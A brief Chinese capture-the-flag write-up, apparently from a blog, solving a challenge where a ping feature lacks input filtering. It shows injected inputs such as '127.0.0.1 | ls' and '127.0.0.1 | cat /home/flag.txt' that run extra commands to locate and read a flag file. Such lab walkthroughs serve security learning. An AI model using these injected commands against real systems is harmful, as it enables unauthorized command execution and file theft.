题目来源: Cyberpeace-n3k0

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

 

 

首先测试一下127.0.0.1,发现返回了ping的结果

然后127.0.0.1 | ls,返回index.php,命令被成功zhixing

127.0.0.1 | find / -name flag.txt,找到flag.txt,位于/home下

127.0.0.1 | cat /home/flag.txt,得到flag

相关文章:

  • 2021-04-09
  • 2021-08-30
  • 2021-08-24
  • 2022-12-23
  • 2021-10-17
  • 2021-12-24
  • 2021-10-21
  • 2021-09-14
猜你喜欢
  • 2021-06-17
  • 2021-06-22
  • 2021-06-30
  • 2021-08-09
  • 2021-12-27
  • 2021-04-05
  • 2021-04-03
相关资源
相似解决方案